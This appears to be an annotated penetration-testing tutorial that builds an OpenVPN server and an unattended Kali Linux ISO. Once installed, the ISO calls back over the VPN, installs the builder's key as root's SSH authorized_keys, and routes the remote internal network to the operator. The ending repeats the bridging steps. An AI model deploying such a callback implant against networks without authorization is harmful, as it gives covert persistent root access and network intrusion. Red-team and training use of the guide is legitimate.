We will first set up our OpenVPN server on a Kali Linux box with an external IP address (a.b.c.d). Once that’s done, we’ll build the Kali Linux ISO of Doom on the same machine and make it available for download over HTTP.
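# Server-side routing and PKI setup. The page listed this sequence twice (the
# first copy stopped before build-dh); it is written once here, because a second
# pass would re-run clean-all and regenerate the CA and every certificate.

# Enable IPv4 forwarding so the server can route for VPN clients. This write is
# not persistent: it is lost on reboot unless net.ipv4.ip_forward is also set in
# the sysctl configuration.
echo "1" > /proc/sys/net/ipv4/ip_forward
# Turn the server into the client's gateway: NAT whatever arrives from the VPN
# subnet (10.8.0.0/24) and leaves through eth0.
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
# Generate the OpenVPN server and client certs.
# -p keeps a re-run from failing when the directory already exists.
mkdir -p /etc/openvpn/easy-rsa
# -r so that subdirectories shipped with easy-rsa are copied too; a plain
# `cp dir/**` skips directories (and `**` only recurses with globstar enabled).
cp -r /usr/share/easy-rsa/* /etc/openvpn/easy-rsa/
cd /etc/openvpn/easy-rsa/
# Remove the --interact flag from two of the build scripts, presumably so they
# run without prompting and take the certificate fields from ./vars; review
# ./vars before sourcing it. build-key is not patched and still prompts.
sed -i 's/ --interact//' build-ca
sed -i 's/ --interact//' build-key-server
. ./vars
# NOTE(review): clean-all is expected to empty the key directory, which
# invalidates every certificate issued from a previous run.
./clean-all
./build-ca
./build-key-server server
./build-key client
# NOTE(review): the copy below expects dh2048.pem, i.e. a 2048-bit key size in
# ./vars; confirm the file name build-dh actually produces.
./build-dh
cp -rf keys/{server.crt,server.key,dh2048.pem,ca.crt} /etc/openvpn/
# The server's private key must stay readable by root only.
chmod 600 /etc/openvpn/server.key
# keys/ca.key stays behind in easy-rsa/keys. It can sign new client
# certificates that this server will accept, so restrict access to it or move
# it off the internet-facing host once the certificates are issued.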
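# Generate the OpenVPN server configuration file.
cd /etc/openvpn
# The file is written from one quoted here-document so that every directive
# lands on its own line and the push argument keeps its ASCII double quotes.
# (The page had typographic quotes around it and several commands fused onto
# one line, neither of which produces a valid server.conf.)
#
# NOTE(review): comp-lzo is deprecated in current OpenVPN releases, and
# compressing tunnel traffic can leak plaintext through ciphertext length
# (VORACLE). Removing it here requires removing it from the client config too.
# NOTE(review): no tls-auth/tls-crypt key is configured, so the listener
# completes TLS handshakes with any peer before certificate checks apply.
cat > server.conf << 'EOF'
tls-server
port 443
proto tcp
dev tap
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
push "redirect-gateway def1 bypass-dhcp"
client-config-dir static
keepalive 10 120
comp-lzo
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
EOF
# Per-client settings (not keys): client-config-dir entries are looked up by
# certificate common name, so static/client applies to the certificate issued
# with `build-key client` and pins that client to 10.8.0.200.
mkdir -p static
echo ifconfig-push 10.8.0.200 255.255.255.0 > static/client
cd ~
# start the OpenVPN server
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.
# Set a passphrase when prompted: the public half is later installed as root's
# authorized_keys on the agent image, so this private key is a root credential.
ssh-keygen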
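# Building the Kali Reverse VPN Agent ISO
apt-get update
apt-get install git live-build cdebootstrap curl -y
# NOTE(review): git:// is an unauthenticated, unencrypted transport, and this
# repository decides what goes into the image. Prefer the project's HTTPS
# remote and check out a reviewed commit.
git clone git://git.kali.org/live-build-config.git build
cd build
# Chroot hooks that enable the ssh and openvpn services in the built image.
# They are appended with >>, so re-running this section duplicates the lines.
echo 'update-rc.d -f ssh enable' >> kali-config/common/hooks/01-start-ssh.chroot
chmod +x kali-config/common/hooks/01-start-ssh.chroot
echo 'update-rc.d -f openvpn enable' >> kali-config/common/hooks/02-start-openvpn.chroot
chmod +x kali-config/common/hooks/02-start-openvpn.chroot
# NOTE(review): this download is saved as an executable build hook and the
# preseed fetched further down drives the installer; neither is inspected or
# checksummed here. Read both files before building.
wget https://www.kali.org/dojo/unattended.txt -O kali-config/common/hooks/02-unattended-boot.binary
chmod +x kali-config/common/hooks/02-unattended-boot.binary
# Reuse the key pair generated during the server setup; an unconditional
# second ssh-keygen stops at an overwrite prompt for the same file.
[ -f /root/.ssh/id_rsa.pub ] || ssh-keygen
mkdir -p kali-config/common/includes.chroot/root/.ssh/
# Installs the builder's public key as root's authorized_keys in the image.
cp /root/.ssh/id_rsa.pub kali-config/common/includes.chroot/root/.ssh/authorized_keys
wget https://www.kali.org/dojo/preseed.cfg -O ./kali-config/common/includes.installer/preseed.cfg
# Extra packages for the image.
echo openvpn >> kali-config/common/package-lists/kali.list.chroot
echo openssh-server >> kali-config/common/package-lists/kali.list.chroot
echo open-vm-tools >> kali-config/common/package-lists/kali.list.chroot
# -p creates both levels and tolerates directories that already exist.
mkdir -p kali-config/common/includes.chroot/etc/openvpn
# The image now carries the VPN client's private key (client.key). Anyone who
# obtains the ISO can extract it and authenticate to the server as this
# client, so limit who can fetch the image and revoke the certificate if the
# image leaves your control.
cp /etc/openvpn/easy-rsa/keys/{ca.crt,client.crt,client.key} kali-config/common/includes.chroot/etc/openvpn/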
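# Client-side OpenVPN configuration baked into the image.
# - The delimiter is quoted so the shell writes the text literally.
# - your_server_ip is a placeholder for the server's external address.
# - remote-cert-tls server replaces ns-cert-type server, which is deprecated
#   and no longer accepted by newer OpenVPN releases. It makes the client
#   reject peers whose certificate is not marked for server use, so another
#   client certificate from the same CA cannot pose as the server.
#   NOTE(review): confirm the certificate from build-key-server carries the
#   server key-usage extensions this check relies on.
# - dev, proto and comp-lzo must match the server configuration.
cat << 'EOF' > kali-config/common/includes.chroot/etc/openvpn/client.conf
client
dev tap
proto tcp
remote your_server_ip 443 # remote server IP
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client.crt
key client.key
remote-cert-tls server
comp-lzo
verb 3
EOF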
# Replace the packaged libdebian-installer with a build from the 0.99 source.
apt-get remove --purge libdebian-installer4 -y
# NOTE(review): the tarball is fetched over plain HTTP and nothing verifies it
# before `make install` runs as root. Compare its SHA-256 with the value in the
# signed .dsc for this version (<EXPECTED_SHA256>) before unpacking.
wget http://ftp.debian.org/debian/pool/main/libd/libdebian-installer/libdebian-installer_0.99.tar.xz
tar xvf libdebian-installer_0.99.tar.xz
cd libdebian-installer-0.99
# Only lists where parser_rfc822 occurs. No edit to src is shown on this page,
# so what gets built below is the unmodified 0.99 source.
grep -R parser_rfc822 src
# NOTE(review): unlike the earlier installs there is no -y, so this prompts.
apt-get install automake libtool
autoreconf -i -v
./configure
make
make install
# NOTE(review): this leaves the build tree for the home directory, and the lb
# commands that follow on the page then run from there; confirm which
# directory was intended.
cd ~
# Configure and build the live image.
lb config
lb build
# Publish the image from the web root. It contains the VPN client's private
# key and a root authorized_keys entry (both copied in earlier on this page),
# and plain HTTP gives no access control or integrity protection. Restrict
# who can reach this path and remove the file once it has been fetched.
mv binary.hybrid.iso /var/www/
# NOTE(review): on Debian-based systems the service is usually named apache2;
# confirm the name on the build host.
service apache start
cd /etc/openvpn/
# Runs the server in the foreground using the config generated earlier.
# NOTE(review): the init script was already started earlier on this page; a
# second instance would presumably fail to bind the same port. Confirm which
# of the two is intended.
openvpn --config /etc/openvpn/server.conf
Now, when you boot a system from the ISO, it will start an unattended install and connect back over the VPN after the reboot.
Bridging the Network Gaps
Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.
# on the server
Enable routing to the remote network on the OpenVPN server:
# Send traffic for the agent's LAN (192.168.101.0/24 in this example) through
# 10.8.0.200, the tunnel address pinned to the client in static/client.
# The route is not persistent across reboots.
route add -net 192.168.101.0/24 gw 10.8.0.200
# on Kali Agent
We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:
# Let the agent forward packets between the tunnel and its LAN.
echo 1 >/proc/sys/net/ipv4/ip_forward
# NAT traffic from the VPN subnet out of eth0. Hosts on the remote network
# therefore see the agent's own address as the source of these connections,
# which is where they will show up in that network's flow and host logs.
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
based on https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/
# Start the OpenVPN server through its init script.
/etc/init.d/openvpn start
# Generate SSH keys to later access the client.
# Protect the private key with a passphrase when prompted.
ssh-keygen
Bridging the Network Gaps
Once the VPN connection is established by the client, we can SSH to our internal Kali Linux agent and complete the final requirement: to bridge the remote and local networks together.
# on the server
# Route the example remote LAN (192.168.101.0/24) via the agent's tunnel
# address 10.8.0.200; not persistent across reboots.
route add -net 192.168.101.0/24 gw 10.8.0.200
# on Kali Agent
We proceed and turn on IP forwarding along with IP masquerade on the remote Kali agent:
# Enable packet forwarding on the agent.
echo 1 >/proc/sys/net/ipv4/ip_forward
# Masquerade VPN-subnet traffic leaving eth0, so the remote network sees the
# agent's address as the source.
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE
based on https://www.offensive-security.com/kali-linux/kali-linux-iso-of-doom/